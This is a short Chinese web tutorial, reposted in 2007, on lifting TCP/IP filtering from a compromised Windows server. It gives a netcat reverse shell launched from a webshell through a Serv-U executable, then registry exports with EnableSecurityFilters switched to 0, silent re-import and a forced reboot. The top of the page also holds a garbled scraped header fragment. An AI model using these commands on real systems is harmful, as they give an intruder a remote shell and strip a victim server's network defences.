regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser vices\Tcpip C" name="description" />

解除TCP/IP限制的小技巧

发表于:2007-06-23来源:作者:点击数: 标签:
1.用NC反弹得到一个shell 本机监听 NC -l -p 32 WEBSHELL运行: x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port" 得到一个shell 2.CMD下导出注册表文件 C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser vices\Tcpip C

   
  1.用NC反弹得到一个shell

本机监听 NC -l -p 32

WEBSHELL运行:

x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port"

得到一个shell

2.CMD下导出注册表文件

C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser
vices\Tcpip

C:\>regedit -e x:\xxx\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

C:\>regedit -e x:\xxx\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

修改各文件 EnableSecurityFilters 处
将最后的1改为0

3.将注册表文件导入
x:\xxx>regedit -s 1.reg
x:\xxx>regedit -s 2.reg
x:\xxx>regedit -s 3.reg
-S 为无提示

重启命令 iisreset /reboot

完成TCP/IP筛选限制

原文转自:http://www.ltesting.net